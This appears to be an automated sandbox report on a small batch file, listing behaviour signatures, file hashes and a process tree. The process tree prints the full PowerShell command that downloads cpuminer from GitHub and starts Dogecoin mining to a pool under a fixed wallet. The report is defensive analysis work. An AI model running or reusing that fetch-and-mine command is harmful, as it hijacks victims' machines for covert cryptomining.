b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

Analysis

max time kernel
1796s
max time network
1807s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
03/02/2024, 10:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

499B
MD5

fe74bff27516829a88cfbc6f6e99646f
SHA1

0c15d859211c79910b277d07e729bec7197a60cd
SHA256

b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512

a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
8	928	powershell.exe
10	928	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
460	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
460	cpuminer-sse2.exe
460	cpuminer-sse2.exe
460	cpuminer-sse2.exe
460	cpuminer-sse2.exe
460	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
928	powershell.exe
928	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	928	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 776 wrote to memory of 928	776	cmd.exe	84
PID 776 wrote to memory of 928	776	cmd.exe	84
PID 928 wrote to memory of 2284	928	powershell.exe	92
PID 928 wrote to memory of 2284	928	powershell.exe	92
PID 2284 wrote to memory of 460	2284	cmd.exe	94
PID 2284 wrote to memory of 460	2284	cmd.exe	94

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:776
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:928
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2284
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:460

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o0ocnpeh.ia1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
653KB

MD5
4bb1835c03dcd5f2f5b99aa12d25abd7

SHA1
adc70db53bcb7533f9cd8260ce42cdcffac2bf6f

SHA256
bf68df49b17ac5f7ce086653a9434e4173ac3be7ba075612ff5533ed204d65f8

SHA512
6275b78a44dd2aa789c22fb59c2e9ab24f6480347cc148dd667523aa20979d0c1cb2029952a2d818722d937ad5061dd7caf6f88d9fbbca99e717fc7d6b326681

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
393KB

MD5
cdfb179e77d0a8664ff62b6bcc3e9f07

SHA1
19ce0152b06fc9093cf933b667bb874d824aa04c

SHA256
9076368f5e5a314fc098932e87699bb2fc93510c7668ee77032a67ea45e5ac7e

SHA512
99007f66d5fa1629742e7e13f1181ad9b51fa953b832010578efa45dc8dde42835a2b24b1199e46dbf1c3f26f872578f8aea5ce475d6d8831a39d53904753c07

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
434KB

MD5
8ea1502f824e457fc1e9868535d5d763

SHA1
dc44dbe4ad07bef31ccca08eefa532c69870f624

SHA256
82ac9252003d049cfef1fa8042fb1cf07e7050744b4a203980ceda44d942618f

SHA512
1257b2857d908a952babab5302b4dab755d67bbc7d98e8f5db38ee0908f8bbbd9dda166c9fa12aa64c7f486f4a3083c96bbe0becc9d13fda9e3b23d72d3d1d52

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
650KB

MD5
39ab448a6137ca1fb398aa3858999d60

SHA1
ee670c0464622633a744ffd02f40768d773f57cf

SHA256
fa646cdfc2b3c65e6010d45083c1bd2c589d2c7d14cd6294be498b7001f95a1d

SHA512
42afd3503a3bf7612f79498d168d2a23107852c91937f450a54b899d860f94a82dc09872fc76b2b1e05af4b8a33800be4bf45533a5c3934b36a824c8d090ff65

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
619KB

MD5
ab267a62d9952d65719027ab91437121

SHA1
81adcff06a6b2dc36b7b1e1cc9a155177e613c89

SHA256
d04bfbb6b7dd2c08a787458facdd1f7660678cf4100fe3639e2d4035da19c4b9

SHA512
ea1b3dc6370ddebe36286e0bf160611620e1350e98faf3b6e0c511d9287b43a38141fcb621518f98caa41a684908334309156a50885779047ecf798681f0f38c

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
423KB

MD5
d879b953e6575c8651b9981f2b7dc6db

SHA1
799b7c640e1cf881f6e1069271283f9ccc0a3dd6

SHA256
ae91faca9fd3ec8763d6deff6715e14dc1f09e2ba046cba967937ceb5a65aff9

SHA512
6a51e79dd51c7e39b00eb0ff9acee88e4295af7bc01001bc9803907271bf9eaaaf325752f72d5c6752cf6e08385a910ff1c10c3472799b2531dc2ebb6b963fa9

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
369KB

MD5
fede42f069b2ded6f51d300238b88baa

SHA1
070918a46b32e10ccd9c0a38e0aac886f80e0b1f

SHA256
dac89dfb7c5a095a47473401c0bb98f09170b1ad1792ce3ec47ca600c7bc54d8

SHA512
1da0cfd7dd6bc73d6150886610adefb30a9eb67df775afa651b3ba0720fd90bece27bdba1943e5853e6103ba61f4d0954edce5d4042f58e0f47d63ed0d442237

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
2.3MB

MD5
ac231ebd81d9ab26cd62688483ed30a9

SHA1
c5f0be2d212aee8de6d59d6304c0218ef1759495

SHA256
00177d877a76bbcabc904a6e79ddf4715e33edfb13817e5e75fd8acf157d0171

SHA512
42998e48139a3bdf791ce491af7eb1a83f15ea4e60ffcf057e13fe82caf6a6dde079a18842b770f14dbd1d36a5a024436cc1eb89d38039ede0029e41c9372a23

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
1.3MB

MD5
d587bf77b6b268f2ad77a7d514f9e3ff

SHA1
7a987a3bbba0989b66892ce48642dd5daf1de923

SHA256
1a34d33fdf367ad63dd78974cd53a5ff6297dffebd2f046b2ab43f0962b6fe0e

SHA512
849f427ec8b63396a8b5f2bbc7fc74f6c62bcc223e22bd6776fb576d98bd01a53a6d43ef948737e6f37ed9b7474aac1db1744efd4098d22cc7c31e368446be64

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
466KB

MD5
654dfab914df89ee3e3517851957afa2

SHA1
c2197ec749869b52331da3cbf5aa362dad0b6b26

SHA256
32526228b9acd3b66473fdb11543e3def370753de39f6640370ae9a5aeb101c4

SHA512
2dbbbee9e582000f978b14f7b3584fea6603186c922fb0fc4c4cf0becf5e903902da074997383329e8316d12d8f0db8553e43926bd866c32702c0f6ab7b08e30

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
591KB

MD5
91dcd837fa80d942084e7458ec38a423

SHA1
38dd38ec9d56cb9f39b51dfe5c6e4ca442af9db1

SHA256
1ffecc3b591c17940bfc24b4a980347dc1055dd3ab7c17c8d8650aaea3f18ecc

SHA512
b1aa1103103d74f3f4e37d0326cafb6e7054fa1da00053e58f81b254719cd44f3d3cd016b421704e06782c6c4576f36d7da6912c5fbad9481d1cff74e9761e6e

Download Submit
memory/460-74-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/460-73-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/460-133-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/460-128-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/460-113-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/460-98-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/460-93-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/460-88-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/460-83-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/460-78-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/460-77-0x00000000010E0000-0x0000000002995000-memory.dmp

Filesize
24.7MB

Download
memory/460-75-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/460-76-0x0000000072160000-0x00000000721F8000-memory.dmp

Filesize
608KB

Download
memory/928-16-0x0000014973960000-0x0000014973A6E000-memory.dmp

Filesize
1.1MB

Download
memory/928-15-0x0000014971630000-0x0000014971640000-memory.dmp

Filesize
64KB

Download
memory/928-0-0x00000149736B0000-0x0000014973742000-memory.dmp

Filesize
584KB

Download
memory/928-11-0x0000014971400000-0x0000014971410000-memory.dmp

Filesize
64KB

Download
memory/928-12-0x00007FF885B30000-0x00007FF8865F1000-memory.dmp

Filesize
10.8MB

Download
memory/928-13-0x0000014971630000-0x0000014971640000-memory.dmp

Filesize
64KB

Download
memory/928-14-0x0000014971630000-0x0000014971640000-memory.dmp

Filesize
64KB

Download
memory/928-7-0x0000014971430000-0x0000014971452000-memory.dmp

Filesize
136KB

Download
memory/928-42-0x0000014971630000-0x0000014971640000-memory.dmp

Filesize
64KB

Download
memory/928-17-0x0000014971600000-0x0000014971616000-memory.dmp

Filesize
88KB

Download
memory/928-18-0x00007FF885B30000-0x00007FF8865F1000-memory.dmp

Filesize
10.8MB

Download
memory/928-20-0x0000014973870000-0x0000014973882000-memory.dmp

Filesize
72KB

Download
memory/928-21-0x0000014971620000-0x000001497162A000-memory.dmp

Filesize
40KB

Download
memory/928-60-0x00007FF885B30000-0x00007FF8865F1000-memory.dmp

Filesize
10.8MB

Download